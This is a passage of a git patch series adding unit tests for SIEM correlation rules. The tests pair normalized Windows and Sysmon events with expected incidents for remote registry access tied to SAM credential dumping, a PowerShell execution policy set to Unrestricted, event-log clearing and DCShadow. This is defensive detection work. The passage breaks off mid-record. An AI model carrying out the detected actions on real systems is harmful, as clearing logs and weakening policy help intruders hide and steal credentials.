"00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2022-02-16T10:37:20.451Z", "type": "raw", "uuid": "e3eba102-ac65-4f59-8231-ac059985af3a"} +{"action": "access", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Security-Auditing\",\"Guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\"},\"EventID\":\"5145\",\"Version\":\"0\",\"Level\":\"0\",\"Task\":\"12811\",\"Opcode\":\"0\",\"Keywords\":\"0x8020000000000000\",\"TimeCreated\":{\"SystemTime\":\"2022-02-16T10:37:20.5086654Z\"},\"EventRecordID\":\"2988532\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"4\",\"ThreadID\":\"7208\"},\"Channel\":\"Security\",\"Computer\":\"01566s-win16-ir.threebeesco.com\",\"Security\":\"\"},\"EventData\":{\"Data\":[{\"Name\":\"SubjectUserSid\",\"text\":\"S-1-5-21-308926384-506822093-3341789130-220106\"},{\"Name\":\"SubjectUserName\",\"text\":\"samir\"},{\"Name\":\"SubjectDomainName\",\"text\":\"3B\"},{\"Name\":\"SubjectLogonId\",\"text\":\"0x567515\"},{\"Name\":\"ObjectType\",\"text\":\"File\"},{\"Name\":\"IpAddress\",\"text\":\"172.16.66.25\"},{\"Name\":\"IpPort\",\"text\":\"50251\"},{\"Name\":\"ShareName\",\"text\":\"\\\\\\\\*\\\\IPC$\"},{\"Name\":\"ShareLocalPath\"},{\"Name\":\"RelativeTargetName\",\"text\":\"winreg\"},{\"Name\":\"AccessMask\",\"text\":\"0x12019f\"},{\"Name\":\"AccessList\",\"text\":\"%%1538 %%1541 %%4416 %%4417 %%4418 %%4419 %%4420 %%4423 %%4424\"},{\"Name\":\"AccessReason\",\"text\":\"-\"}]}}}", "category.generic": "File System Object", "category.high": "System Management", "category.low": "Manipulation", "datafield6": "0x12019f", "datafield9": "READ_CONTROL|SYNCHRONIZE|ReadData (or ListDirectory)|WriteData (or AddFile)|AppendData (or AddSubdirectory or CreatePipeInstance)|ReadEA|WriteEA|ReadAttributes|WriteAttributes", "dst.fqdn": "01566s-win16-ir.threebeesco.com", "dst.host": "01566s-win16-ir.threebeesco.com", "dst.hostname": "01566s-win16-ir", "event_src.category": "Operating system", "event_src.fqdn": "01566s-win16-ir.threebeesco.com", "event_src.host": "01566s-win16-ir.threebeesco.com", "event_src.hostname": "01566s-win16-ir", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_5145_A_network_share_object_was_checked", "importance": "medium", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "5145", "normalized": true, "object": "file_object", "object.fullpath": "\\ipc$\\winreg", "object.name": "winreg", "object.path": "\\ipc$\\", "object.storage.fullpath": "\\winreg", "object.storage.id": "\\\\*\\ipc$", "object.storage.name": "winreg", "object.storage.path": "\\", "object.type": "file", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-13T12:35:27.482Z", "src.host": "172.16.66.25", "src.ip": "172.16.66.25", "src.port": 50251, "status": "success", "subject": "account", "subject.account.domain": "3b", "subject.account.id": "S-1-5-21-308926384-506822093-3341789130-220106", "subject.account.name": "samir", "subject.account.privileges": "%%1538 %%1541 %%4416 %%4417 %%4418 %%4419 %%4420 %%4423 %%4424", "subject.account.session_id": "5666069", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2022-02-16T10:37:20.508Z", "type": "raw", "uuid": "19727dc8-193a-4062-ba1e-a5c197eea927"} + +# Тут будет твой тест. В секции expect укажи сколько и каких корреляционных событий ты ожидаешь +expect 1 {"action": "access", "category.generic": "Attack", "category.high": "Credential Access", "category.low": "OS Credential Dumping: Security Account Manager", "correlation_name": "Remote_registry_access", "correlation_type": "incident", "datafield6": "0x12019f", "datafield9": "%%1538 %%1541 %%4416 %%4417 %%4418 %%4419 %%4420 %%4423 %%4424", "dst.fqdn": "01566s-win16-ir.threebeesco.com", "dst.host": "01566s-win16-ir.threebeesco.com", "dst.hostname": "01566s-win16-ir", "event_src.category": "Operating system", "event_src.fqdn": "01566s-win16-ir.threebeesco.com", "event_src.host": "01566s-win16-ir.threebeesco.com", "event_src.hostname": "01566s-win16-ir", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "importance": "medium", "incident.aggregation.key": "Remote_registry_access|5666069", "incident.aggregation.timeout": 3600, "incident.category": "Undefined", "incident.severity": "medium", "object": "file_object", "object.fullpath": "\\ipc$\\winreg", "object.name": "winreg", "object.path": "\\ipc$\\", "object.storage.fullpath": "\\winreg", "object.storage.id": "\\\\*\\ipc$", "object.storage.name": "winreg", "object.storage.path": "\\", "src.host": "172.16.66.25", "src.ip": "172.16.66.25", "src.port": 50251, "status": "success", "subject": "account", "subject.account.domain": "3b", "subject.account.id": "S-1-5-21-308926384-506822093-3341789130-220106", "subject.account.name": "samir", "subject.account.privileges": "READ_CONTROL|SYNCHRONIZE|ReadData (or ListDirectory)|WriteData (or AddFile)|AppendData (or AddSubdirectory or CreatePipeInstance)|ReadEA|WriteEA|ReadAttributes|WriteAttributes", "subject.account.session_id": "5666069", "subject.privileges": "SeBackupPrivilege SeRestorePrivilege"} From 467a7eccfb7a96861a5e940f1fb39e76e37ec733 Mon Sep 17 00:00:00 2001 From: shadow2033 <135636880+shadow2033@users.noreply.github.com> Date: Mon, 31 Jul 2023 10:41:55 +0300 Subject: [PATCH 16/57] =?UTF-8?q?=D0=94=D0=BE=D0=B1=D0=B0=D0=B2=D0=BB?= =?UTF-8?q?=D0=B5=D0=BD=20=D0=BC=D0=BE=D0=B4=D1=83=D0=BB=D1=8C=D0=BD=D1=8B?= =?UTF-8?q?=D0=B9=20=D1=82=D0=B5=D1=81=D1=82=20=D0=B4=D0=BB=D1=8F=20=D0=BF?= =?UTF-8?q?=D1=80=D0=B0=D0=B2=D0=B8=D0=BB=D0=B0=20(Change=5Fpowershell=5Fp?= =?UTF-8?q?olicy=5Fregistry)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../Change_powershell_policy_registry/tests/test_1.sc | 4 ++++ 1 file changed, 4 insertions(+) create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/Change_powershell_policy_registry/tests/test_1.sc diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/Change_powershell_policy_registry/tests/test_1.sc b/packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/Change_powershell_policy_registry/tests/test_1.sc new file mode 100644 index 00000000..d033e8de --- /dev/null +++ b/packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/Change_powershell_policy_registry/tests/test_1.sc @@ -0,0 +1,4 @@ +{"action": "modify", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"13\",\"Version\":\"2\",\"Level\":\"4\",\"Task\":\"13\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-05-24 15:38:21.485899\"},\"EventRecordID\":\"1387\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"220\",\"ThreadID\":\"2200\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"IEWIN7\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\",\"text\":\"Defense Evasion - PowerShell ExecPolicy Changed\"},{\"Name\":\"EventType\",\"text\":\"SetValue\"},{\"Name\":\"UtcTime\",\"text\":\"2019-05-24 15:38:21.365\"},{\"Name\":\"ProcessGuid\",\"text\":\"{365abb72-0fae-5ce8-0000-0010fe1e0800}\"},{\"Name\":\"ProcessId\",\"text\":\"3208\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\"},{\"Name\":\"TargetObject\",\"text\":\"HKLM\\\\SOFTWARE\\\\Microsoft\\\\PowerShell\\\\1\\\\ShellIds\\\\Microsoft.PowerShell\\\\ExecutionPolicy\"},{\"Name\":\"Details\",\"text\":\"Unrestricted\"}]}}}", "category.generic": "Registry Object", "category.high": "System Management", "category.low": "Manipulation", "event_src.category": "Other", "event_src.fqdn": "iewin7", "event_src.host": "iewin7", "event_src.hostname": "iewin7", "event_src.rule": "Defense Evasion - PowerShell ExecPolicy Changed", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_13_Registry_value_changed", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "13", "normalized": true, "object": "reg_object", "object.fullpath": "\\registry\\machine\\software\\microsoft\\powershell\\1\\shellids\\microsoft.powershell\\executionpolicy", "object.name": "executionpolicy", "object.new_value": "unrestricted", "object.path": "\\registry\\machine\\software\\microsoft\\powershell\\1\\shellids\\microsoft.powershell\\", "object.property": "value", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-10T16:50:46.783Z", "status": "success", "subject.process.fullpath": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe", "subject.process.guid": "365abb72-0fae-5ce8-0000-0010fe1e0800", "subject.process.id": "3208", "subject.process.name": "powershell.exe", "subject.process.path": "c:\\windows\\system32\\windowspowershell\\v1.0\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-05-24T15:38:21.365Z", "type": "raw", "uuid": "036f8f61-521a-493a-8499-c6c5ebbf8ae7"} + +# Тут будет твой тест. В секции expect укажи сколько и каких корреляционных событий ты ожидаешь +expect 1 {"action": "modify", "alert.context": "powershell.exe: unrestricted -> \\registry\\machine\\software\\microsoft\\powershell\\1\\shellids\\microsoft.powershell\\executionpolicy", "alert.key": "unrestricted -> \\registry\\machine\\software\\microsoft\\powershell\\1\\shellids\\microsoft.powershell\\executionpolicy", "category.generic": "Attack", "category.high": "Defense Evasion", "category.low": "Modify Registry", "correlation_name": "Change_powershell_policy_registry", "correlation_type": "incident", "event_src.category": "Other", "event_src.fqdn": "iewin7", "event_src.host": "iewin7", "event_src.hostname": "iewin7", "event_src.rule": "Defense Evasion - PowerShell ExecPolicy Changed", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "importance": "medium", "incident.aggregation.key": "Change_powershell_policy_registry|iewin7|powershell.exe", "incident.aggregation.timeout": 7200, "incident.category": "Undefined", "incident.severity": "medium", "object": "reg_object", "object.fullpath": "\\registry\\machine\\software\\microsoft\\powershell\\1\\shellids\\microsoft.powershell\\executionpolicy", "object.name": "executionpolicy", "object.new_value": "unrestricted", "object.path": "\\registry\\machine\\software\\microsoft\\powershell\\1\\shellids\\microsoft.powershell\\", "object.property": "value", "status": "success", "subject": "process", "subject.process.fullpath": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe", "subject.process.guid": "365abb72-0fae-5ce8-0000-0010fe1e0800", "subject.process.id": "3208", "subject.process.name": "powershell.exe", "subject.process.path": "c:\\windows\\system32\\windowspowershell\\v1.0\\"} From f9e306a979e6c087bdc0a28fba7f767ce0d4eb11 Mon Sep 17 00:00:00 2001 From: shadow2033 <135636880+shadow2033@users.noreply.github.com> Date: Mon, 31 Jul 2023 10:49:51 +0300 Subject: [PATCH 17/57] =?UTF-8?q?=D0=94=D0=BE=D0=B1=D0=B0=D0=B2=D0=BB?= =?UTF-8?q?=D0=B5=D0=BD=20=D0=BC=D0=BE=D0=B4=D1=83=D0=BB=D1=8C=D0=BD=D1=8B?= =?UTF-8?q?=D0=B9=20=D1=82=D0=B5=D1=81=D1=82,=20=D1=80=D0=B0=D1=81=D1=88?= =?UTF-8?q?=D0=B8=D1=80=D0=B8=D0=BB=20=D0=BF=D0=BE=D0=BB=D1=8F=20=D0=B4?= =?UTF-8?q?=D0=B0=D0=BD=D0=BD=D1=8B=D1=85=20=D0=BA=D0=BE=D1=82=D0=BE=D1=80?= =?UTF-8?q?=D1=8B=D0=B5=20=D0=BC=D1=8B=20=D0=BE=D0=B6=D0=B8=D0=B4=D0=B0?= =?UTF-8?q?=D0=B5=D0=BC=20=D0=B4=D0=BB=D1=8F=20=D0=BF=D1=80=D0=B0=D0=B2?= =?UTF-8?q?=D0=B8=D0=BB=D0=B0(Clearing=5Feventlog)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../Clearing_eventlog/tests/test_1.sc | 2 +- .../Clearing_eventlog/tests/test_2.sc | 2 +- .../Clearing_eventlog/tests/test_3.sc | 4 ++++ 3 files changed, 6 insertions(+), 2 deletions(-) create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/Clearing_eventlog/tests/test_3.sc diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/Clearing_eventlog/tests/test_1.sc b/packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/Clearing_eventlog/tests/test_1.sc index 1e564644..2c39f2e0 100644 --- a/packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/Clearing_eventlog/tests/test_1.sc +++ b/packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/Clearing_eventlog/tests/test_1.sc @@ -1,3 +1,3 @@ {"action": "clean", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Eventlog\",\"Guid\":\"{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}\"},\"EventID\":\"104\",\"Version\":\"0\",\"Level\":\"4\",\"Task\":\"104\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-03-19T23:34:25.8943413Z\"},\"EventRecordID\":\"27736\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"812\",\"ThreadID\":\"3916\"},\"Channel\":\"System\",\"Computer\":\"PC01.example.corp\",\"Security\":{\"UserID\":\"S-1-5-21-1587066498-1489273250-1035260531-1106\"}},\"UserData\":{\"LogFileCleared\":{\"xmlns:auto-ns3\":\"3>http://schemas.microsoft.com/win/2004/08/events\",\"xmlns\":\"http://manifests.microsoft.com/win/2004/08/windows/eventlog\",\"SubjectUserName\":\"user01\",\"SubjectDomainName\":\"EXAMPLE\",\"Channel\":\"System\",\"BackupPath\":\"\"}}}}", "event_src.category": "Operating system", "event_src.fqdn": "pc01.example.corp", "event_src.host": "pc01.example.corp", "event_src.hostname": "pc01", "event_src.subsys": "System", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Common_System_104_Log_was_cleared", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "104", "normalized": true, "object": "log", "object.name": "System", "object.property": "backup path", "object.value": "", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-01T11:11:22.781Z", "status": "success", "subject": "account", "subject.account.domain": "example", "subject.account.id": "S-1-5-21-1587066498-1489273250-1035260531-1106", "subject.account.name": "user01", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-03-19T23:34:25.894Z", "type": "raw", "uuid": "836bf47c-840f-416f-9fc5-042f340c47c7"} -expect 1 {"action": "clean", "alert.context": "example\\user01 clean System", "alert.key": "System", "category.generic": "Attack", "category.high": "Defense Evasion", "category.low": "Indicator Removal", "correlation_name": "Clearing_eventlog", "correlation_type": "incident", "event_src.fqdn": "pc01.example.corp", "event_src.host": "pc01.example.corp", "event_src.hostname": "pc01", "importance": "medium", "object": "log", "object.name": "System", "object.property": "backup path", "object.value": "", "status": "success", "subject": "account", "subject.account.domain": "example", "subject.account.id": "S-1-5-21-1587066498-1489273250-1035260531-1106", "subject.account.name": "user01"} \ No newline at end of file +expect 1 {"action": "clean", "alert.context": "example\\user01 clean System", "alert.key": "System", "category.generic": "Attack", "category.high": "Defense Evasion", "category.low": "Indicator Removal", "correlation_name": "Clearing_eventlog", "correlation_type": "incident", "event_src.category": "Operating system", "event_src.fqdn": "pc01.example.corp", "event_src.host": "pc01.example.corp", "event_src.hostname": "pc01", "event_src.subsys": "System", "event_src.title": "windows", "event_src.vendor": "microsoft", "importance": "medium", "incident.aggregation.key": "Clearing_eventlog|pc01.example.corp", "incident.aggregation.timeout": 7200, "incident.category": "Undefined", "incident.severity": "medium", "object": "log", "object.name": "System", "object.property": "backup path", "object.value": "", "status": "success", "subject": "account", "subject.account.domain": "example", "subject.account.id": "S-1-5-21-1587066498-1489273250-1035260531-1106", "subject.account.name": "user01"} \ No newline at end of file diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/Clearing_eventlog/tests/test_2.sc b/packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/Clearing_eventlog/tests/test_2.sc index 9281f60f..96fc5735 100644 --- a/packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/Clearing_eventlog/tests/test_2.sc +++ b/packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/Clearing_eventlog/tests/test_2.sc @@ -1,3 +1,3 @@ {"action": "clean", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Eventlog\",\"Guid\":\"{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}\"},\"EventID\":\"104\",\"Version\":\"0\",\"Level\":\"4\",\"Task\":\"104\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-03-19T23:34:25.8943413Z\"},\"EventRecordID\":\"27736\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"812\",\"ThreadID\":\"3916\"},\"Channel\":\"System\",\"Computer\":\"PC01.example.corp\",\"Security\":{\"UserID\":\"S-1-5-21-1587066498-1489273250-1035260531-1106\"}},\"UserData\":{\"LogFileCleared\":{\"xmlns:auto-ns3\":\"3>http://schemas.microsoft.com/win/2004/08/events\",\"xmlns\":\"http://manifests.microsoft.com/win/2004/08/windows/eventlog\",\"SubjectUserName\":\"user01\",\"SubjectDomainName\":\"EXAMPLE\",\"Channel\":\"System\",\"BackupPath\":\"Allalalal\"}}}}", "event_src.category": "Operating system", "event_src.fqdn": "pc01.example.corp", "event_src.host": "pc01.example.corp", "event_src.hostname": "pc01", "event_src.subsys": "System", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Common_System_104_Log_was_cleared", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "104", "normalized": true, "object": "log", "object.name": "System", "object.property": "backup path", "object.value": "Allalalal", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-01T11:11:22.781Z", "status": "success", "subject": "account", "subject.account.domain": "example", "subject.account.id": "S-1-5-21-1587066498-1489273250-1035260531-1106", "subject.account.name": "user01", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-03-19T23:34:25.894Z", "type": "raw", "uuid": "836bf47c-840f-416f-9fc5-042f340c47c7"} -expect 1 {"action": "clean", "alert.context": "example\\user01 clean System", "alert.key": "System", "category.generic": "Attack", "category.high": "Defense Evasion", "category.low": "Indicator Removal", "correlation_name": "Clearing_eventlog", "correlation_type": "incident", "event_src.fqdn": "pc01.example.corp", "event_src.host": "pc01.example.corp", "event_src.hostname": "pc01", "importance": "medium", "object": "log", "object.name": "System", "object.property": "backup path", "object.value": "Allalalal", "status": "success", "subject": "account", "subject.account.domain": "example", "subject.account.id": "S-1-5-21-1587066498-1489273250-1035260531-1106", "subject.account.name": "user01"} +expect 1 {"action": "clean", "alert.context": "example\\user01 clean System", "alert.key": "System", "category.generic": "Attack", "category.high": "Defense Evasion", "category.low": "Indicator Removal", "correlation_name": "Clearing_eventlog", "correlation_type": "incident", "event_src.category": "Operating system", "event_src.fqdn": "pc01.example.corp", "event_src.host": "pc01.example.corp", "event_src.hostname": "pc01", "event_src.subsys": "System", "event_src.title": "windows", "event_src.vendor": "microsoft", "importance": "medium", "incident.aggregation.key": "Clearing_eventlog|pc01.example.corp", "incident.aggregation.timeout": 7200, "incident.category": "Undefined", "incident.severity": "medium", "object": "log", "object.name": "System", "object.property": "backup path", "object.value": "Allalalal", "status": "success", "subject": "account", "subject.account.domain": "example", "subject.account.id": "S-1-5-21-1587066498-1489273250-1035260531-1106", "subject.account.name": "user01"} \ No newline at end of file diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/Clearing_eventlog/tests/test_3.sc b/packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/Clearing_eventlog/tests/test_3.sc new file mode 100644 index 00000000..2b9e7666 --- /dev/null +++ b/packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/Clearing_eventlog/tests/test_3.sc @@ -0,0 +1,4 @@ +{"action": "clean", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Eventlog\",\"Guid\":\"{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}\"},\"EventID\":\"1102\",\"Version\":\"0\",\"Level\":\"4\",\"Task\":\"104\",\"Opcode\":\"0\",\"Keywords\":\"0x4020000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-03-19T23:35:07.5242021Z\"},\"EventRecordID\":\"452811\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"812\",\"ThreadID\":\"3916\"},\"Channel\":\"Security\",\"Computer\":\"PC01.example.corp\",\"Security\":\"\"},\"UserData\":{\"LogFileCleared\":{\"xmlns:auto-ns3\":\"3>http://schemas.microsoft.com/win/2004/08/events\",\"xmlns\":\"http://manifests.microsoft.com/win/2004/08/windows/eventlog\",\"SubjectUserSid\":\"S-1-5-21-1587066498-1489273250-1035260531-1106\",\"SubjectUserName\":\"user01\",\"SubjectDomainName\":\"EXAMPLE\",\"SubjectLogonId\":\"0x17dad\"}}}}", "event_src.category": "Operating system", "event_src.fqdn": "pc01.example.corp", "event_src.host": "pc01.example.corp", "event_src.hostname": "pc01", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_1102_Audit_log_was_cleared", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1102", "normalized": true, "object": "log", "object.name": "Security", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-02T06:04:59.892Z", "status": "success", "subject": "account", "subject.account.domain": "example", "subject.account.id": "S-1-5-21-1587066498-1489273250-1035260531-1106", "subject.account.name": "user01", "subject.account.session_id": "97709", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-03-19T23:35:07.524Z", "type": "raw", "uuid": "704cf992-087a-4de2-b497-8a31d3b1390e"} + +# Тут будет твой тест. В секции expect укажи сколько и каких корреляционных событий ты ожидаешь +expect 1 {"action": "clean", "alert.context": "example\\user01 clean Security", "alert.key": "Security", "category.generic": "Attack", "category.high": "Defense Evasion", "category.low": "Indicator Removal", "correlation_name": "Clearing_eventlog", "correlation_type": "incident", "event_src.category": "Operating system", "event_src.fqdn": "pc01.example.corp", "event_src.host": "pc01.example.corp", "event_src.hostname": "pc01", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "importance": "medium", "incident.aggregation.key": "Clearing_eventlog|pc01.example.corp", "incident.aggregation.timeout": 7200, "incident.category": "Undefined", "incident.severity": "medium", "object": "log", "object.name": "Security", "status": "success", "subject": "account", "subject.account.domain": "example", "subject.account.id": "S-1-5-21-1587066498-1489273250-1035260531-1106", "subject.account.name": "user01"} From 6937ce3663ab63c652367579653eff63ee18e855 Mon Sep 17 00:00:00 2001 From: shadow2033 <135636880+shadow2033@users.noreply.github.com> Date: Mon, 31 Jul 2023 10:57:07 +0300 Subject: [PATCH 18/57] =?UTF-8?q?=D0=A0=D0=B0=D1=81=D1=88=D0=B8=D1=80?= =?UTF-8?q?=D0=B8=D0=BB=20=D0=BF=D0=BE=D0=BB=D1=8F=20=D0=B4=D0=B0=D0=BD?= =?UTF-8?q?=D0=BD=D1=8B=D1=85=20=D0=BA=D0=BE=D1=82=D0=BE=D1=80=D1=8B=D0=B5?= =?UTF-8?q?=20=D0=BC=D1=8B=20=D0=BE=D0=B6=D0=B8=D0=B4=D0=B0=D0=B5=D0=BC=20?= =?UTF-8?q?=D0=B4=D0=BB=D1=8F=20=D0=BF=D1=80=D0=B0=D0=B2=D0=B8=D0=BB=D0=B0?= =?UTF-8?q?=20(DCShadow=5FAttack)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../DCShadow_Attack/tests/test_1.sc | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/DCShadow_Attack/tests/test_1.sc b/packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/DCShadow_Attack/tests/test_1.sc index c71671f8..64bd8bc0 100644 --- a/packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/DCShadow_Attack/tests/test_1.sc +++ b/packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/DCShadow_Attack/tests/test_1.sc @@ -1,4 +1,5 @@ {"action": "modify", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Security-Auditing\",\"Guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\"},\"EventID\":\"4742\",\"Version\":\"0\",\"Level\":\"0\",\"Task\":\"13825\",\"Opcode\":\"0\",\"Keywords\":\"0x8020000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-05-08T03:00:37.5861731Z\"},\"EventRecordID\":\"203057\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"444\",\"ThreadID\":\"1224\"},\"Channel\":\"Security\",\"Computer\":\"DC1.insecurebank.local\",\"Security\":\"\"},\"EventData\":{\"Data\":[{\"Name\":\"ComputerAccountChange\",\"text\":\"-\"},{\"Name\":\"TargetUserName\",\"text\":\"ALICE$\"},{\"Name\":\"TargetDomainName\",\"text\":\"insecurebank\"},{\"Name\":\"TargetSid\",\"text\":\"S-1-5-21-738609754-2819869699-4189121830-1120\"},{\"Name\":\"SubjectUserSid\",\"text\":\"S-1-5-21-738609754-2819869699-4189121830-500\"},{\"Name\":\"SubjectUserName\",\"text\":\"Administrator\"},{\"Name\":\"SubjectDomainName\",\"text\":\"insecurebank\"},{\"Name\":\"SubjectLogonId\",\"text\":\"0x418a6fb\"},{\"Name\":\"PrivilegeList\",\"text\":\"-\"},{\"Name\":\"SamAccountName\",\"text\":\"-\"},{\"Name\":\"DisplayName\",\"text\":\"-\"},{\"Name\":\"UserPrincipalName\",\"text\":\"-\"},{\"Name\":\"HomeDirectory\",\"text\":\"-\"},{\"Name\":\"HomePath\",\"text\":\"-\"},{\"Name\":\"ScriptPath\",\"text\":\"-\"},{\"Name\":\"ProfilePath\",\"text\":\"-\"},{\"Name\":\"UserWorkstations\",\"text\":\"-\"},{\"Name\":\"PasswordLastSet\",\"text\":\"-\"},{\"Name\":\"AccountExpires\",\"text\":\"-\"},{\"Name\":\"PrimaryGroupId\",\"text\":\"-\"},{\"Name\":\"AllowedToDelegateTo\",\"text\":\"-\"},{\"Name\":\"OldUacValue\",\"text\":\"-\"},{\"Name\":\"NewUacValue\",\"text\":\"-\"},{\"Name\":\"UserAccountControl\",\"text\":\"-\"},{\"Name\":\"UserParameters\",\"text\":\"-\"},{\"Name\":\"SidHistory\",\"text\":\"-\"},{\"Name\":\"LogonHours\",\"text\":\"-\"},{\"Name\":\"DnsHostName\",\"text\":\"-\"},{\"Name\":\"ServicePrincipalNames\",\"text\":\"HOST/alice.insecurebank.local RestrictedKrbHost/alice.insecurebank.local HOST/ALICE RestrictedKrbHost/ALICE TERMSRV/alice.insecurebank.local TERMSRV/ALICE WSMAN/alice.insecurebank.local WSMAN/alice GC/alice.insecurebank.local/insecurebank.local E3514235-4B06-11D1-AB04-00C04FC2DCD2/ae9a3b29-01d1-4851-8ca8-e49cd3985e5b/insecurebank.local\"}]}}}", "category.generic": "Account", "category.high": "Users And Rights Management", "category.low": "Manipulation", "datafield2": "host/alice.insecurebank.local restrictedkrbhost/alice.insecurebank.local host/alice restrictedkrbhost/alice termsrv/alice.insecurebank.local termsrv/alice wsman/alice.insecurebank.local wsman/alice gc/alice.insecurebank.local/insecurebank.local e3514235-4b06-11d1-ab04-00c04fc2dcd2/ae9a3b29-01d1-4851-8ca8-e49cd3985e5b/insecurebank.local", "event_src.category": "Directory service", "event_src.fqdn": 